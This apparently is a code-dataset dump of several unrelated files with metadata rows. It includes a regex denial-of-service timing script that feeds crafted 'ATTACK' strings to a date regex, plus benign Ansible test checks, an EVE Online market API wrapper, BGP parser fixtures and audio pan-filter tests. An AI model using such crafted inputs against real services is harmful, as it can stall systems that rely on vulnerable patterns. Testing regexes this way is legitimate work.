*(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) 
*(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))) *(?:(?:(?:1[0-2]|0?[1-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))? *(?:(?i:[ap]m)))|(?:(?:2[0-3]|[01]?[0-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?))))$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "10" + " " * i * 10000 + "!1 __POA(i)"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i * 10000}: took {DURATION} seconds!") | 257.052632 | 2,234 | 0.326986 | 903 | 4,884 | 1.760797 | 0.080842 | 0.103145 | 0.075472 | 0.050314 | 0.833962 | 0.833962 | 0.833962 | 0.833962 | 0.833962 | 0.833962 | 0 | 0.151 | 0.048116 | 4,884 | 19 | 2,235 | 257.052632 | 0.191009 | 0.474816 | 0 | 0 | 0 | 0.090909 | 0.887065 | 0.690113 | 0.090909 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.090909 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
181bb14ed46df7ff91e79ad0c079c2ef45e1523b | 1,623 | py | Python | tests/test_check_playbook_file_removed_and_added.py | deperrone/content | caaff27f01a1d6c15da461f9fafe26090e8fdd18 | [
"BSD-3-Clause"
] | 1,138 | 2018-09-05T06:31:44.000Z | 2022-03-31T03:38:24.000Z | tests/test_check_playbook_file_removed_and_added.py | deperrone/content | caaff27f01a1d6c15da461f9fafe26090e8fdd18 | [
"BSD-3-Clause"
] | 4,743 | 2018-09-04T15:14:04.000Z | 2022-03-31T23:17:57.000Z | tests/test_check_playbook_file_removed_and_added.py | deperrone/content | caaff27f01a1d6c15da461f9fafe26090e8fdd18 | [
"BSD-3-Clause"
] | 400 | 2018-09-08T20:08:49.000Z | 2022-03-30T20:54:32.000Z | import os
import pytest
from .test_ansible_file_removed_and_added import check_playbook_file_removed_and_added
def test_file_removed_and_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_removed_and_added.yml")
assert not check_playbook_file_removed_and_added(playbook_path)
def test_file_removed_and_not_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_removed_and_not_added.yml")
assert check_playbook_file_removed_and_added(playbook_path)
def test_file_not_removed_and_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_not_removed_and_added.yml")
assert check_playbook_file_removed_and_added(playbook_path)
def test_file_block_removed_and_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_block_removed_and_added.yml")
assert not check_playbook_file_removed_and_added(playbook_path)
def test_file_block_removed_and_not_added():
playbook_path = os.path.join(os.path.dirname(__file__),
"ansible_file_removed_and_added",
"file_block_removed_and_not_added.yml")
assert check_playbook_file_removed_and_added(playbook_path)
| 40.575 | 86 | 0.666051 | 200 | 1,623 | 4.755 | 0.1 | 0.231335 | 0.283912 | 0.279706 | 0.964248 | 0.912723 | 0.874869 | 0.874869 | 0.874869 | 0.874869 | 0 | 0 | 0.268638 | 1,623 | 39 | 87 | 41.615385 | 0.801179 | 0 | 0 | 0.535714 | 0 | 0 | 0.187307 | 0.187307 | 0 | 0 | 0 | 0 | 0.178571 | 1 | 0.178571 | false | 0 | 0.107143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
1821fc50c5fa639d7564c9223f89a140a640a726 | 15,539 | py | Python | django_eve_data/esi_api/markets.py | SvenMatzke/EveData | a890c5bf4197f63092938de5d35c63054e0bb18c | [
"MIT"
] | 1 | 2017-02-26T20:34:11.000Z | 2017-02-26T20:34:11.000Z | django_eve_data/esi_api/markets.py | SvenMatzke/eve_data | a890c5bf4197f63092938de5d35c63054e0bb18c | [
"MIT"
] | null | null | null | django_eve_data/esi_api/markets.py | SvenMatzke/eve_data | a890c5bf4197f63092938de5d35c63054e0bb18c | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Autogenerated Template File
"""
from .base import EsiRequestObject
class MarketsDetailOrders(object):
    base_url = "https://esi.tech.ccp.is/latest/markets/{region_id}/orders/"
    get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_region_id_orders_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_region_id_orders_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '200': {'schema': {'items': {'title': 'get_markets_region_id_orders_200_ok', 'type': 'object', 'properties': {'duration': {'format': 'int32', 'type': 'integer', 'description': 'duration integer', 'title': 'get_markets_region_id_orders_duration'}, 'price': {'format': 'float', 'type': 'number', 'description': 'price number', 'title': 'get_markets_region_id_orders_price'}, 'location_id': {'format': 'int64', 'type': 'integer', 'description': 'location_id integer', 'title': 'get_markets_region_id_orders_location_id'}, 'min_volume': {'format': 'int32', 'type': 'integer', 'description': 'min_volume integer', 'title': 'get_markets_region_id_orders_min_volume'}, 'range': {'enum': ['station', 'region', 'solarsystem', '1', '2', '3', '4', '5', '10', '20', '30', '40'], 'type': 'string', 'description': 'range string', 'title': 'get_markets_region_id_orders_range'}, 'issued': {'format': 'date-time', 'type': 'string', 'description': 'issued string', 'title': 'get_markets_region_id_orders_issued'}, 'is_buy_order': {'type': 'boolean', 'description': 'is_buy_order boolean', 'title': 'get_markets_region_id_orders_is_buy_order'}, 'order_id': {'format': 'int64', 'type': 'integer', 'description': 'order_id integer', 'title': 'get_markets_region_id_orders_order_id'}, 'volume_total': {'format': 'int32', 'type': 'integer', 'description': 'volume_total integer', 'title': 'get_markets_region_id_orders_volume_total'}, 'volume_remain': {'format': 'int32', 'type': 'integer', 'description': 'volume_remain integer', 'title': 'get_markets_region_id_orders_volume_remain'}, 'type_id': {'format': 'int32', 'type': 'integer', 'description': 'type_id integer', 'title': 'get_markets_region_id_orders_type_id'}}, 'description': '200 ok object', 'required': ['order_id', 'type_id', 'location_id', 'volume_total', 'volume_remain', 'min_volume', 'price', 'is_buy_order', 'duration', 'issued', 'range']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_region_id_orders_ok'}, 'examples': {'application/json': [{'duration': 90, 'price': 9.9, 'location_id': 60005599, 'min_volume': 1, 'range': 'region', 'issued': '2016-09-03T05:12:25Z', 'is_buy_order': False, 'order_id': 4623824223, 'volume_total': 2000000, 'volume_remain': 1296000, 'type_id': 34}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of orders'}, '422': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Unprocessable entity message', 'title': 'get_markets_region_id_orders_422_unprocessable_entity'}}, 'description': 'Unprocessable entity', 'title': 'get_markets_region_id_orders_unprocessable_entity'}, 'examples': {'application/json': {'error': 'Unprocessable entity message'}}, 'description': 'Not found'}}

    def get(self, region_id, datasource="tranquility", order_type="all", page=1, **kwargs):
        """
        Return a list of orders in a region
        ---
        Alternate route: `/v1/markets/{region_id}/orders/`
        Alternate route: `/legacy/markets/{region_id}/orders/`
        Alternate route: `/dev/markets/{region_id}/orders/`
        ---
        This route is cached for up to 300 seconds
        :type region_id: int
        :param region_id: Return orders in this region
        :type datasource: str
        :param datasource: The server name you would like data from
        :type order_type: str
        :param order_type: Filter buy/sell orders, return all orders by default. If you query without type_id, we always return both buy and sell orders.
        :type page: int
        :param page: Which page to query, only used for querying without type_id. Starting at 1
        :param kwargs: type_id, user_agent, X-User-Agent
        """
        kwargs_dict = {
            "region_id": region_id, "datasource": datasource, "order_type": order_type, "page": page,
        }
        kwargs_dict.update(kwargs)
        return EsiRequestObject(self.base_url, self.get_responses) \
            .get(**kwargs_dict)
class MarketsStructuresDetail(object):
    base_url = "https://esi.tech.ccp.is/latest/markets/structures/{structure_id}/"
    get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_structures_structure_id_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_structures_structure_id_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '403': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Forbidden message', 'title': 'get_markets_structures_structure_id_403_forbidden'}}, 'description': 'Forbidden', 'title': 'get_markets_structures_structure_id_forbidden'}, 'examples': {'application/json': {'error': 'Token is not valid for scope(s): esi-markets.structure_markets.v1'}}, 'description': 'Forbidden'}, '200': {'schema': {'items': {'title': 'get_markets_structures_structure_id_200_ok', 'type': 'object', 'properties': {'duration': {'format': 'int32', 'type': 'integer', 'description': 'duration integer', 'title': 'get_markets_structures_structure_id_duration'}, 'price': {'format': 'float', 'type': 'number', 'description': 'price number', 'title': 'get_markets_structures_structure_id_price'}, 'location_id': {'format': 'int64', 'type': 'integer', 'description': 'location_id integer', 'title': 'get_markets_structures_structure_id_location_id'}, 'min_volume': {'format': 'int32', 'type': 'integer', 'description': 'min_volume integer', 'title': 'get_markets_structures_structure_id_min_volume'}, 'range': {'enum': ['station', 'region', 'solarsystem', '1', '2', '3', '4', '5', '10', '20', '30', '40'], 'type': 'string', 'description': 'range string', 'title': 'get_markets_structures_structure_id_range'}, 'issued': {'format': 'date-time', 'type': 'string', 'description': 'issued string', 'title': 'get_markets_structures_structure_id_issued'}, 'is_buy_order': {'type': 'boolean', 'description': 'is_buy_order boolean', 'title': 'get_markets_structures_structure_id_is_buy_order'}, 'order_id': {'format': 'int64', 'type': 'integer', 'description': 'order_id integer', 'title': 'get_markets_structures_structure_id_order_id'}, 'volume_total': {'format': 'int32', 'type': 'integer', 'description': 'volume_total integer', 'title': 'get_markets_structures_structure_id_volume_total'}, 'volume_remain': {'format': 'int32', 'type': 'integer', 'description': 'volume_remain integer', 'title': 'get_markets_structures_structure_id_volume_remain'}, 'type_id': {'format': 'int32', 'type': 'integer', 'description': 'type_id integer', 'title': 'get_markets_structures_structure_id_type_id'}}, 'description': '200 ok object', 'required': ['order_id', 'type_id', 'location_id', 'volume_total', 'volume_remain', 'min_volume', 'price', 'is_buy_order', 'duration', 'issued', 'range']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_structures_structure_id_ok'}, 'examples': {'application/json': [{'duration': 90, 'price': 9.9, 'location_id': 60005599, 'min_volume': 1, 'range': 'region', 'issued': '2016-09-03T05:12:25Z', 'is_buy_order': False, 'order_id': 4623824223, 'volume_total': 2000000, 'volume_remain': 1296000, 'type_id': 34}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of orders'}}

    def get(self, structure_id, datasource="tranquility", page=1, **kwargs):
        """
        Return all orders in a structure
        ---
        Alternate route: `/v1/markets/structures/{structure_id}/`
        Alternate route: `/legacy/markets/structures/{structure_id}/`
        Alternate route: `/dev/markets/structures/{structure_id}/`
        ---
        This route is cached for up to 300 seconds
        :type structure_id: int
        :param structure_id: Return orders in this structure
        :type datasource: str
        :param datasource: The server name you would like data from
        :type page: int
        :param page: Which page to query, starting at 1
        :param kwargs: token, user_agent, X-User-Agent
        """
        kwargs_dict = {
            "structure_id": structure_id, "datasource": datasource, "page": page,
        }
        kwargs_dict.update(kwargs)
        return EsiRequestObject(self.base_url, self.get_responses) \
            .get(**kwargs_dict)
class MarketsDetailHistory(object):
    base_url = "https://esi.tech.ccp.is/latest/markets/{region_id}/history/"
    get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_region_id_history_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_region_id_history_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '200': {'schema': {'items': {'title': 'get_markets_region_id_history_200_ok', 'type': 'object', 'properties': {'date': {'format': 'date', 'type': 'string', 'description': 'The date of this historical statistic entry', 'title': 'get_markets_region_id_history_date'}, 'highest': {'format': 'float', 'type': 'number', 'description': 'highest number', 'title': 'get_markets_region_id_history_highest'}, 'average': {'format': 'float', 'type': 'number', 'description': 'average number', 'title': 'get_markets_region_id_history_average'}, 'order_count': {'format': 'int64', 'type': 'integer', 'description': 'Total number of orders happened that day', 'title': 'get_markets_region_id_history_order_count'}, 'lowest': {'format': 'float', 'type': 'number', 'description': 'lowest number', 'title': 'get_markets_region_id_history_lowest'}, 'volume': {'format': 'int64', 'type': 'integer', 'description': 'Total', 'title': 'get_markets_region_id_history_volume'}}, 'description': '200 ok object', 'required': ['date', 'order_count', 'volume', 'highest', 'average', 'lowest']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_region_id_history_ok'}, 'examples': {'application/json': [{'date': '2015-05-01', 'highest': 5.27, 'average': 5.25, 'order_count': 2267, 'lowest': 5.11, 'volume': 16276782035}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of historical market statistics'}, '422': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Unprocessable entity message', 'title': 'get_markets_region_id_history_422_unprocessable_entity'}}, 'description': 'Unprocessable entity', 'title': 'get_markets_region_id_history_unprocessable_entity'}, 'examples': {'application/json': {'error': 'Unprocessable entity message'}}, 'description': 'Not found'}}

    def get(self, region_id, type_id, datasource="tranquility", **kwargs):
        """
        Return a list of historical market statistics for the specified type in a region
        ---
        Alternate route: `/v1/markets/{region_id}/history/`
        Alternate route: `/legacy/markets/{region_id}/history/`
        Alternate route: `/dev/markets/{region_id}/history/`
        ---
        This route is cached for up to 3600 seconds
        :type region_id: int
        :param region_id: Return statistics in this region
        :type type_id: int
        :param type_id: Return statistics for this type
        :type datasource: str
        :param datasource: The server name you would like data from
        :param kwargs: user_agent, X-User-Agent
        """
        kwargs_dict = {
            "region_id": region_id, "type_id": type_id, "datasource": datasource,
        }
        kwargs_dict.update(kwargs)
        return EsiRequestObject(self.base_url, self.get_responses) \
            .get(**kwargs_dict)
class MarketsPrices(object):
    base_url = "https://esi.tech.ccp.is/latest/markets/prices/"
    get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_prices_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_prices_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '200': {'schema': {'items': {'title': 'get_markets_prices_200_ok', 'type': 'object', 'properties': {'adjusted_price': {'format': 'float', 'type': 'number', 'description': 'adjusted_price number', 'title': 'get_markets_prices_adjusted_price'}, 'average_price': {'format': 'float', 'type': 'number', 'description': 'average_price number', 'title': 'get_markets_prices_average_price'}, 'type_id': {'format': 'int32', 'type': 'integer', 'description': 'type_id integer', 'title': 'get_markets_prices_type_id'}}, 'description': '200 ok object', 'required': ['type_id']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_prices_ok'}, 'examples': {'application/json': [{'adjusted_price': 306988.09, 'average_price': 306292.67, 'type_id': 32772}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of prices'}}

    def get(self, datasource="tranquility", **kwargs):
        """
        Return a list of prices
        ---
        Alternate route: `/v1/markets/prices/`
        Alternate route: `/legacy/markets/prices/`
        Alternate route: `/dev/markets/prices/`
        ---
        This route is cached for up to 3600 seconds
        :type datasource: str
        :param datasource: The server name you would like data from
        :param kwargs: user_agent, X-User-Agent
        """
        kwargs_dict = {
            "datasource": datasource,
        }
        kwargs_dict.update(kwargs)
        return EsiRequestObject(self.base_url, self.get_responses) \
            .get(**kwargs_dict) | 98.348101 | 3,530 | 0.679516 | 1,839 | 15,539 | 5.495922 | 0.112017 | 0.041951 | 0.078658 | 0.060255 | 0.848422 | 0.824775 | 0.736123 | 0.688335 | 0.665875 | 0.640843 | 0 | 0.027292 | 0.139327 | 15,539 | 158 | 3,531 | 98.348101 | 0.728428 | 0.178326 | 0 | 0.390244 | 1 | 0 | 0.64028 | 0.174908 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.02439 | 0 | 0.512195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
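Every `get()` method in the ESI wrapper above builds its request the same way: a dict of required and defaulted parameters, then `kwargs_dict.update(kwargs)` so caller-supplied extras (and overrides) win. A minimal, dependency-free sketch of that merge pattern (`build_params` is an illustrative name, not part of the original module):

```python
# The parameter-merge idiom shared by the get() methods above.
def build_params(required, **overrides):
    params = dict(required)   # copy so the defaults dict is never mutated
    params.update(overrides)  # caller-supplied kwargs override defaults
    return params

params = build_params({"datasource": "tranquility", "page": 1}, page=3)
# → {"datasource": "tranquility", "page": 3}
```

Copying before updating matters when the defaults dict is shared: `update` in place would leak one call's overrides into the next.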
182e2c0ab96081eddea139ce0c7c46394dbeba54 | 12,034 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIpBgpAll/cli/equal/golden_output2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowIpBgpAll/cli/equal/golden_output2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowIpBgpAll/cli/equal/golden_output2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"vrf": {
"L3VPN-0050": {
"address_family": {
"vpnv4 unicast RD 5918:50": {
"bgp_table_version": 27013588,
"default_vrf": "L3VPN-0050",
"route_distinguisher": "5918:50",
"route_identifier": "10.169.197.254",
"routes": {
"172.16.200.1/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.10/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.11/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.12/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.13/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.14/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.15/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.16/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.17/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.18/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.19/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.2/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.20/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.3/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.4/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.5/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.6/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.7/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.8/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.9/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.99/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
},
"vrf_route_identifier": "192.168.10.254",
}
}
}
}
}
| 44.57037 | 63 | 0.170766 | 563 | 12,034 | 3.522202 | 0.115453 | 0.12708 | 0.08472 | 0.18003 | 0.885527 | 0.885527 | 0.885527 | 0.885527 | 0.885527 | 0.885527 | 0 | 0.212084 | 0.727688 | 12,034 | 269 | 64 | 44.736059 | 0.393042 | 0 | 0 | 0.624535 | 0 | 0 | 0.176915 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
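The golden-output fixture above repeats an identical best-path entry for 21 prefixes. As a maintenance aid (not part of the genieparser test suite itself), such a repetitive sub-dict could be generated rather than hand-written; `build_routes` and its defaults below are hypothetical helpers that mirror the values in the fixture.

```python
# Sketch: generate the repetitive "routes" sub-dict instead of writing it by hand.
# Attribute values mirror the fixture above; helper name and signature are made up.

def build_routes(prefixes, next_hop="10.13.202.64", path="60000"):
    """Return one identical best-path entry per prefix, as in the golden output."""
    entry = {
        "localpref": 100,
        "next_hop": next_hop,
        "origin_codes": "i",
        "path": path,
        "status_codes": "*>i",
        "weight": 0,
    }
    # copy the entry per prefix so later per-route edits do not alias each other
    return {p: {"index": {1: dict(entry)}} for p in prefixes}

# .1 through .20 plus .99, matching the 21 prefixes in the fixture
prefixes = ["172.16.200.%d/32" % i for i in list(range(1, 21)) + [99]]
routes = build_routes(prefixes)
```

Generating the fixture this way keeps a single source of truth for the shared attributes, at the cost of hiding the literal expected values from a reader of the test.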
185b2eb34f8e0c0f1c8d25a74069654523c27d07 | 2,052 | py | Python | tests/Python/Tools/PyATKTools_Pan_test.py | apohl79/AudioTK | 05ac241b0bc6a8f841d93257b4d81e5961b1f627 | [
"BSD-3-Clause"
] | 10 | 2018-05-17T15:29:05.000Z | 2021-12-19T22:26:08.000Z | tests/Python/Tools/PyATKTools_Pan_test.py | apohl79/AudioTK | 05ac241b0bc6a8f841d93257b4d81e5961b1f627 | [
"BSD-3-Clause"
] | null | null | null | tests/Python/Tools/PyATKTools_Pan_test.py | apohl79/AudioTK | 05ac241b0bc6a8f841d93257b4d81e5961b1f627 | [
"BSD-3-Clause"
] | 2 | 2020-04-21T13:43:57.000Z | 2020-04-28T19:10:14.000Z | #!/usr/bin/env python
from nose.tools import raises
def Pan_linear_left_test():
import numpy as np
from ATK.Core import DoubleInPointerFilter, DoubleOutPointerFilter
from ATK.Tools import DoublePanFilter
from numpy.testing import assert_almost_equal
t = np.arange(1000, dtype=np.float64)[None, :]
input = np.sin(t * 1000 * 2 * np.pi / 48000)
output = np.ascontiguousarray(np.zeros(2000, dtype=np.float64).reshape(2, -1))
inputfilter = DoubleInPointerFilter(input, False)
panfilter = DoublePanFilter()
outputfilter = DoubleOutPointerFilter(output, False)
inputfilter.set_output_sampling_rate(48000)
panfilter.set_input_sampling_rate(48000)
panfilter.set_pan_law(DoublePanFilter.LINEAR_TAPER)
panfilter.set_pan(-1)
outputfilter.set_input_sampling_rate(48000)
panfilter.set_input_port(0, inputfilter, 0)
outputfilter.set_input_port(0, panfilter, 0)
outputfilter.set_input_port(1, panfilter, 1)
outputfilter.process(1000)
assert_almost_equal(input[0], output[0])
assert_almost_equal(0, output[1])
def Pan_linear_right_test():
import numpy as np
from ATK.Core import DoubleInPointerFilter, DoubleOutPointerFilter
from ATK.Tools import DoublePanFilter
from numpy.testing import assert_almost_equal
t = np.arange(1000, dtype=np.float64)[None, :]
input = np.sin(t * 1000 * 2 * np.pi / 48000)
output = np.ascontiguousarray(np.zeros(2000, dtype=np.float64).reshape(2, -1))
inputfilter = DoubleInPointerFilter(input, False)
panfilter = DoublePanFilter()
outputfilter = DoubleOutPointerFilter(output, False)
inputfilter.set_output_sampling_rate(48000)
panfilter.set_input_sampling_rate(48000)
panfilter.set_pan_law(DoublePanFilter.LINEAR_TAPER)
panfilter.set_pan(1)
outputfilter.set_input_sampling_rate(48000)
panfilter.set_input_port(0, inputfilter, 0)
outputfilter.set_input_port(0, panfilter, 0)
outputfilter.set_input_port(1, panfilter, 1)
outputfilter.process(1000)
assert_almost_equal(input[0], output[1])
assert_almost_equal(0, output[0])
